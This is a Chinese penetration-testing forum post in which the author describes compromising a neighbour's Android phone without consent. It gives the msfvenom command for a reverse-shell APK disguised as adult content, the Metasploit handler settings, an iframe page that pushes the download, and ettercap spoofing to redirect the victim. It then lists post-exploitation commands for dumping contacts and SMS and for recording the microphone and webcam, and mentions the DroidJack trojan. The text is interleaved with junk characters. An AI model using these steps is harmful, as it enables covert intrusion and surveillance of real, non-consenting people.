找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2258|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

& K8 r& X. }0 E7 [9 ]4 Z 五、msf+ettercap入侵邻居安卓手机 ! i* f3 _6 L: j) T( W; A& }; g

: w0 L2 v4 c3 _6 ^! D5 S

6 }9 r; r) [) `* }2 }9 { 首先启动msf d+ ^" d& X! j7 ], q

4 g6 l- q- n" D4 h* u3 R0 ~

+ S' r6 x' a& T1 n 先用kali生成一个安卓木马,如下命令: * I6 \- o# V# I4 x0 G, F. w

8 f* f1 n4 q$ n6 `0 m+ y# A

! o: A5 j9 k3 y' F+ L/ i8 x; A: g Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk + M& Q* ~7 ]! p- }6 D% k( d

# _2 U. n: ?" R: N; U' C

+ V t1 v( ?1 i4 m" y2 A 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 * |, y8 @, n& i* X/ R( P

3 U+ r, \6 w: u" u9 s

) U2 ^# ?0 p. s* ` 然后进入msf 6 a7 V7 u! ~. Z: V8 v3 N

I- N1 a( @: q9 E

! i9 p; X2 e' w! e& ^- h' h' y( r' p use exploit/multi/handler 5 @ I! f3 n. x- S: q/ K w

7 T$ c! _1 E& N( I

A% s# {3 h+ m+ q set payload android/meterpreter/reverse_tcp ' R! c/ r5 c* K& [. c

, x% d# @ W! m8 e, M

% y) C+ ~5 C, h0 |2 b) ]' o, @! u9 { set LHOST 192.168.0.109 //ipkailiip $ `7 e4 d" x# k1 q2 A

( N/ I' j2 `: p3 [9 c3 I

# K4 O) F# K T set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ' ?! w& U5 P+ d2 y# ]

. B, n1 L \* I& H0 c$ C Q9 O. ?

1 i. ?. B4 _( u, e; z6 h* k! K Exploit ! z3 `# i5 C4 R; i# P" H

/ C) q0 l! T7 g0 j

) `4 n; n$ ]8 q8 Q1 R( U, C) N   1 ]) K9 x! c0 q/ a }

5 \2 J* e) ~2 { _. S$ o

' r. h% I% s7 K 下面我们开启ettercap -G " m7 J! T3 y( H0 u$ N

. B$ } I0 P* ]0 C' @

% C; z! f( ^) ?+ j, e: N 我物理IP + u, y% _( }: ?

- O: n) j' \% ~) a. M q+ N

8 y3 S# V9 u/ [! n   4 M, E* h6 z5 y/ f

' u- U" L4 L3 V1 t( `

$ ?3 N, h4 u0 Q9 b1 ?7 T2 j2 x 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, . P, @( i+ T$ ?1 ?+ j0 Y

8 {& u4 d& ^# P7 }

) Y2 m% K C+ W* M# `1 k 下面我们来设置一下 6 a" i1 A) e6 |2 z7 H: Z

4 I+ p8 }: k+ c

/ Z9 L. t( i; y. p2 N3 Y/ o3 Q6 {   * r. T9 U1 r7 J0 }8 l' O `

0 h8 I* ~: r. g+ t- q

# ~6 t! q: T$ ~/ n9 s 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , l; u" G! K R

/ f% X; H4 e% w/ z# `7 T

4 a m6 Z5 Q1 X6 b$ w. M" p! q   % i7 }7 d: `9 ]6 _6 ?

# W9 l" g5 p5 l9 P0 e; X

! P3 }" @6 c q! i# f; N* L2 T   7 R4 T6 y4 R& \

* u+ t( |1 W( V/ @8 c

3 w' T$ z, L: U& x. D. S2 \   % P$ u" t) E/ q

$ E2 `1 a# w4 O# w

: l4 ^. F1 O9 b' ~+ L% W! e& j   4 @2 W3 f: ?0 T. G& C$ b

1 H% |( B* ~" t5 S5 h; `& [

9 j5 k2 J9 D/ G, w7 A |5 x6 U; ^   3 Z7 F: U/ `- j" q- W9 o

" c8 B. q. `$ i {7 N

' h8 C0 _. {. }! Y4 X   * f7 a) V5 c% I, i3 S4 b9 F

7 x& p1 g* b5 }1 A- x

8 R- m) F. `- M# M, [8 b   @0 ~2 ^. t& J$ a6 X# d

$ R- K0 v' @8 a; q

2 I, u. n6 |" {! S. G, b) e   & F% L/ v; u& o+ ~% ?

# y. N* t' ~! h: q8 { ^' T

! q- X2 O; o8 A0 R8 }$ t2 |% S F   - y: x- l; \( b5 o; m0 E" w

0 s) I! n" K6 Y( ?3 j

) q! {: y4 J; u1 v$ K   & a! o. [* c! i, \: C: z# j

/ p4 R7 z1 B4 _9 o8 z& a

# u0 f2 Z6 p/ v3 P- d, i   + S$ \7 B( ^9 M2 I3 x

/ {% `9 y- c6 J) J3 d9 N

9 S8 h2 R/ F, x/ S! `   + k% [6 L2 L9 r8 |7 e- ^

0 Q' A }1 `- U5 k; n

o4 Y' d/ h+ t; g0 r" j5 d2 A   0 r& K5 ]2 H/ J1 `* S8 u6 j

2 r7 Y6 j2 l- w

( z6 Y8 f' p( P; \% i 下面我们开始攻击 - f7 W/ Q' l& g1 n5 c; K

* ^. n6 W4 }; `

$ C+ P3 }! ^7 y   ; }5 I, L0 ^7 d4 u

) L- Z8 Q" F- A; {8 U1 r, ^9 [

/ f0 Q3 W Q. c   O3 w( m/ F j! p8 F2 A* Z" ~

- U" y: z, [3 x5 _* J9 q' H, Y

& o( B, ^; b% B' X   ( E3 V, b" L1 ~; Z! A" c% e

/ @5 r o( Y' S

0 w( h# w$ r+ A4 K* g   - F, q: @% Y( ^ S& l' ]( `

1 w/ }# g& h6 P

9 t1 |4 x6 B, r4 ^) P+ u( }% ?   3 f$ w& Z' V) o ~% e4 m

4 K- S# \ j) e; }" i" y; k& A

& A# o8 u% n9 l4 l0 d 大概过了5分钟多,发现反弹成功了 2 i8 ~/ }! N' Y! n& f& Y

8 b8 X0 k3 J9 K; V' M u, K* Y X( Q

& I3 r- B+ C2 Y+ d: I8 C0 v   O- V% y! \/ \ ^7 u$ G, |; D7 M

) U/ a+ o+ T1 c# H9 }0 A

: d& s7 J l( |; B   2 o% ?5 P, P; Q+ X+ c. R5 u

- }% h' k; k5 ^' o& ?

& I2 y' I! B0 @" L8 e6 \   ; D; w7 b$ i0 Y1 T1 f8 E) N, K

: _2 i! H& \" g: p/ z% E

" }+ G$ s3 v6 ^- Q; S9 q0 Z   " v- r1 k$ n+ f, u% T* [6 [7 h* Z

0 I9 I6 ]; ?1 l+ P

6 q: M& }0 }: l( |; F! h6 ~6 t& R8 t   - `- b/ ~/ J3 U

6 W* E C6 R# T* E

* {0 v9 |+ `$ [. ?# W   - i F5 c' ~4 Y( Q4 ~) r

! {6 y7 I/ \5 `8 P7 E4 c5 Q

5 v" n+ ?! u3 T& Z! z% R3 T   2 z1 L" o9 {0 \1 W8 H

N$ k2 y0 B4 t# B. N7 ?" e

$ r3 t9 ^% p5 j 执行命令 ! h6 Z; ]8 Y5 j& Y7 C+ y

- O& S3 ~5 e% ]% C- a5 v

8 H3 A% u+ |$ x- V; x   8 G0 C; G, e; W4 C i

: D1 Y$ N$ i$ k% `* N7 `: m9 ]

: \! m$ x# V$ F* S dump_contacts    --》这个是导出电话 - W+ A$ h3 E# g. l8 r

) u6 |# K. g! E; E2 m

% P' X# r: z8 u# S dump_sms --》这个是导出信息 1 q6 i; g0 R, q0 `2 [! w* m6 i

- t" W. T$ }1 `/ ~

7 e9 M& ^. F3 g- K; D) e& ] record_mic     Record audio from the default microphone for X seconds ' ?; L3 k7 B' f* e

& c7 c J, _ d! b

; B- @9 S. i5 Z; B+ ~/ n     webcam_chat    Start a video chat - Y0 e3 i$ S) g7 h2 k) s- l% z, W

7 Z4 w/ T. M9 Z3 G& W4 m/ C

9 G8 \. M4 o% _0 p& G     webcam_list    List webcams 8 B% D+ J6 ?2 ]) z$ n% S4 E

$ @6 d) ^8 Z* n r5 e

' g& J5 t7 ]3 i I) ?( d# s$ H# y3 f     webcam_snap    Take a snapshot from the specified webcam / A8 I9 b( o4 R0 j9 ]

# z+ p6 ^2 ?6 Y4 K

; J; G- W& D* G) z webcam_stream  lay a video stream from the specified webcam ) u: T+ g8 p$ W2 F

, z2 E: y# s' T( T# \

2 w3 D: ~- z# Y& F8 ?- x   - d% C2 `! G: i8 j, R: }

& ]* S, o) v. U3 M8 Z0 U: t

" }/ j/ V7 e" {# `2 S' c   $ T8 T$ S/ T7 L8 l

" h" l( S+ s2 t3 x

- ^1 G3 F, G$ u6 X+ w 我们打开看一下电话薄, 4 X6 |+ `, \0 O( y: M6 O; f

! }$ N6 e9 L J2 Y/ }

. {( {' g: P' h/ G   7 l& x* D2 `! ^! e! o @' `

0 I/ C. e% P4 c7 ~5 _4 R

Q$ a% L6 L2 E0 g9 h u; p   " L3 W0 c% p# V0 C

' I6 \0 h q, V$ y) z) B

: O4 c+ S# `' H9 j [! @   8 |9 {0 [# }3 @# a( x

- E% I: a1 r, Z" H* Y: H% J4 O

5 E5 O9 E: m+ @ t4 Z   8 G/ S3 ~6 z4 R4 e

0 ?$ z4 x! p: _: O8 `

9 D v! ^) S3 ?; f2 t   ' O+ X0 U8 n/ D( v# k+ F1 E. K

4 T: q3 ?5 Q+ j7 i

4 o) {/ F/ a; |   , l" {7 d. g; ?; o

8 h G* y/ i0 B9 q3 o4 Z, e9 F

! M& Q0 ~4 u5 B* Y: P; c7 X 我们同时欺骗成DroidJack木马,使用方法如图: : t b. f: a( z0 C

5 i/ t& K7 e/ J1 b9 I, A5 H

- z# f1 ]4 i9 r! b+ g3 {8 A   ' B Y9 [, ~2 M3 Q- b) h1 i

# J: S3 [. _' S, L

/ \/ J6 L) `: b' w; E   7 ]! A% x( _% o. p+ N/ ]* }

, M+ o" j8 z- N: p3 y' u4 z6 e: h

# ]1 z7 }( A) N: F6 R0 y   $ d0 ^3 P! |0 @) P; G

3 T- ?% a* \+ x

- ^+ L: d9 R/ h2 j/ y- h2 W' {' W 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 " n$ F; \# y" L# f8 B: s

0 c6 b1 G- P7 [2 W0 ~" d

) w) r) i/ ?' I) I8 X, U   ; g0 W& i/ _- _0 s2 T8 ]( A5 F% [

8 c* b, d/ p: Q4 C3 b

5 S: i X8 @1 d   * k5 x$ I; {. \( N8 X

, b% }) O8 {; E/ A3 H- z f

2 B7 H+ Q! e9 R" w7 A1 E   % z) p0 g8 n! V6 s" b% X

3 p- |% g. U" p4 D. |: c* u

- o7 r4 n' ^' R3 ~ 2 H2 @- M3 H" t

3 q5 T. c R. `& ^) C

% W; `& q; Y! |9 P8 P* [, n0 n* W
! f. o- }' b y+ q

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表